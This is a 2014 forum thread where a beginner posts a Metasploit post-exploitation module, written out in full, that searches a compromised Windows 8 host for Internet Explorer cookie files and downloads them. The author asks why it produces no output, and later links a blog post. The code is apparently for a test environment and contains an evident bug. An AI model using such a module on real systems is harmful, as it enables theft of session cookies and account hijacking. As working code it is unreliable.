-=bb=- Posted February 17, 2014

Hi,

Complete beginner with Metasploit, so please be gentle!

I noticed that the enum_ie module doesn't work for Windows 8 clients so was trying to put a script together to download the cookie files in our test environment. I figured it would be a pretty simple exercise in learning my way around the scripting and exploring post exploitation automation as I wanted to include the script as part of the AutoRunScript rc file.

When I run the script in a meterpreter session, I get absolutely no output and I am sure that I am missing something obvious but googling hasn't thrown up anything that I can see.

Here is my script:

    require 'msf/core'
    require 'msf/core/post/file'

    class Metasploit3 < Msf::Post

      include Msf::Post::File

      def initialize(info={})
        super( update_info( info,
          'Name'         => 'Find Windows Cookies',
          'Description'  => %q{ This POST module attempts to download Windows 7 or 8 cookies },
          'License'      => MSF_LICENSE,
          'Author'       => [ '-=bb=- ' ],
          'Version'      => '$Revision: 1.0 $',
          'Platform'     => [ 'win' ],
          'SessionTypes' => [ 'meterpreter' ]
        ))
      end

      def run
        begin
          base = session.fs.file.expand_path("%USERPROFILE%")
          location << base + "\\AppData\\Local\\Microsoft\\Windows\\InetCookies" #windows 8
          target = client.sys.config.sysinfo["Computer"]
          file_type = "*.txt*"
          dump = "/tmp"
          dump = dump + target
          print_status("")
          print_status("\tSearching for and downloading cookies...")
          print_status("")
          getfile = client.fs.file.search(location,file_type,recurse=true,timeout=-1)
          getfile.each do |file|
            print_status("Found #{file['path']}\\#{file['name']}...Saving in - #{dump}")
            client.fs.file.download(dump, "#{file['path']}\\#{file['name']}")
          end
        end
      end
    end

Could anybody point out what bone-headedness I'm performing wrong?

Many thanks in advance

-=bb=- (Author) Posted May 27, 2014

I never quite managed to solve the output issue.

However, I did write a blog post detailing my endeavors and how I ultimately ended up with a reliable working exploit for Windows 8 cookies here: http://blog.interrupt3h.com/?p=286

It still needs polishing for general release (as detailed in the blog post) as well as some error handling and some better clean up but that's for the next rainy bank holiday :)

Hope it helps someone. Would welcome any feedback on my approach.